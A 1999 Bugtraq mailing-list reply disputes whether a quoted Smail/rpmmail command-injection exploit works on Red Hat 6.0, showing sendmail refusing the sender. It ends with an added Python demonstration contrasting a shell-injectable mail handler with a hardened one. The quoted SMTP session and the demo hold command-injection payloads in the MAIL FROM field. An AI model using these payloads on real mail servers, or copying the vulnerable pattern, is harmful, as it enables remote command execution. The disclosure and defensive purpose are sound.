[12163] in bugtraq


RH6.0 local/remote command execution

daemon@ATHENA.MIT.EDU (Neezam Haniff)
Fri Oct 8 16:04:16 1999

Content-Type: text
Message-Id:  <199910061749.NAA01688@www.rcc.ryerson.ca>
Date:         Wed, 6 Oct 1999 13:49:59 -0400
Reply-To: Neezam Haniff <nhaniff@WWW.RCC.RYERSON.CA>
From: Neezam Haniff <nhaniff@WWW.RCC.RYERSON.CA>
X-To:         BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM

Hi,

Here are some comments below...

> The remote exploit is merely:
> bash-2.03$ telnet localhost 25
> Trying 127.0.0.1...
> Connected to localhost.
> Escape character is '^]'.
> 220 fear62 Smail-3.2 (#1 1999-Jul-23) ready at Tue, 5 Oct 1999 11:31:13 -0500
> (CDT)
> MAIL FROM: ;/command/to/execute;
> 250 <;/command/to/execute;> ... Sender Okay
> RCPT TO: rpmmail
> 250 <rpmmail> ... Recipient Okay
> data
> 354 Enter mail, end with "." on a line by itself
> .
> 250 Mail accepted
> quit
>

I find it odd that this exploit could exist on a Red Hat 6.0 installation.
sendmail 8.9.3 is the mailer that is installed and the way it's been
configured, there's no way it would accept that sender address since it's
not qualifiable. Please confirm this. This is what I get when I test this
scenario on a Red Hat 6.0 system:

[nhaniff@dhcp-160-190 nhaniff]$ telnet localhost 25
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
220 dhcp-160-190.x.x ESMTP Sendmail 8.9.3/8.9.3; Wed, 6 Oct 1999 13:31:55 -0400
helo x.x
250 dhcp-160-190.x.x Hello IDENT:nhaniff@localhost [127.0.0.1], pleased to meet you
MAIL FROM: ;/command/to/execute;
553 ;/command/to/execute;... Domain name required

The only way someone could take advantage of this exploit is if their mailer
configuration allows for the sender to be non-qualifiable.

Neezam.
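
As an added example (not code from the original post, from Smail, from sendmail, or from the rpmmail alias, whose source the thread does not show), the following Python models the bug class the quoted exploit relies on and the check the reply describes: a delivery handler that splices the envelope sender into a shell command, beside one that first refuses unqualified senders the way the sendmail 8.9.3 transcript above does and then runs the handler without a shell. The handler is replaced by `echo`, the sender strings are constructed, and the regex approximates the observed "553 ... Domain name required" response rather than copying sendmail's ruleset. It goes beyond the reply in one respect: a qualified address can still carry shell metacharacters, so requiring a domain only narrows the attack, and it is the no-shell invocation in the handler that actually neutralises the payload.

```python
"""Constructed model of the bug class in the quoted Smail exploit and of the
sendmail 8.9.3 sender check shown in the reply. Not code from Smail, sendmail
or rpmmail; the delivery handler is replaced by echo so it runs anywhere."""
import re
import subprocess

# Constructed envelope senders (hypothetical values; only the ';...;' shape
# of HOSTILE_SENDER comes from the quoted exploit, with the command replaced
# by a harmless echo).
GOOD_SENDER = "nhaniff@www.rcc.ryerson.ca"
UNQUALIFIED_SENDER = "nhaniff"
HOSTILE_SENDER = ";echo INJECTED;"                        # quoted exploit's shape
QUALIFIED_HOSTILE = ";echo${IFS}INJECTED;@evil.example"   # has a domain, still hostile


def deliver_via_shell(sender):
    """Vulnerable pattern (hypothetical handler): the envelope sender is
    interpolated into a command line handed to /bin/sh, so a ';' in MAIL FROM
    ends the handler command and starts the attacker's. Returns stdout lines."""
    cmdline = f"echo handler-from={sender}"
    proc = subprocess.run(["/bin/sh", "-c", cmdline],
                          capture_output=True, text=True)
    return proc.stdout.splitlines()


def check_sender(sender):
    """Approximation of the 553 seen in the reply: a sender with no '@domain'
    part is refused before any delivery program sees it. Returns
    (smtp_code, text). The regex is a stand-in for sendmail's own check,
    not a copy of it."""
    m = re.fullmatch(r"<?([^<>@\s]+)@([A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+)>?", sender)
    if m is None:
        return 553, f"{sender}... Domain name required"
    return 250, f"<{m.group(1)}@{m.group(2)}> ... Sender Okay"


def deliver_safely(sender):
    """Hardened pattern: apply the MTA-style check, then invoke the handler as
    an argv list with no shell, so a sender that survives the check reaches
    the handler as one inert argument. Returns (smtp_code, text, stdout_lines)."""
    code, text = check_sender(sender)
    if code != 250:
        return code, text, []
    proc = subprocess.run(["echo", f"handler-from={sender}"],
                          capture_output=True, text=True)
    return code, text, proc.stdout.splitlines()


if __name__ == "__main__":
    for s in (GOOD_SENDER, UNQUALIFIED_SENDER, HOSTILE_SENDER, QUALIFIED_HOSTILE):
        print(repr(s))
        print("  via shell:", deliver_via_shell(s))
        print("  hardened :", deliver_safely(s))
```

Run stand-alone, the shell path turns `;echo INJECTED;` into two commands and prints INJECTED, while the hardened path refuses it with the same 553 the reply shows. QUALIFIED_HOSTILE is the caveat: it carries a domain, so check_sender accepts it, and through the shell the `${IFS}` trick still executes `echo INJECTED`; passed as a single argv element it is just printed back verbatim.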
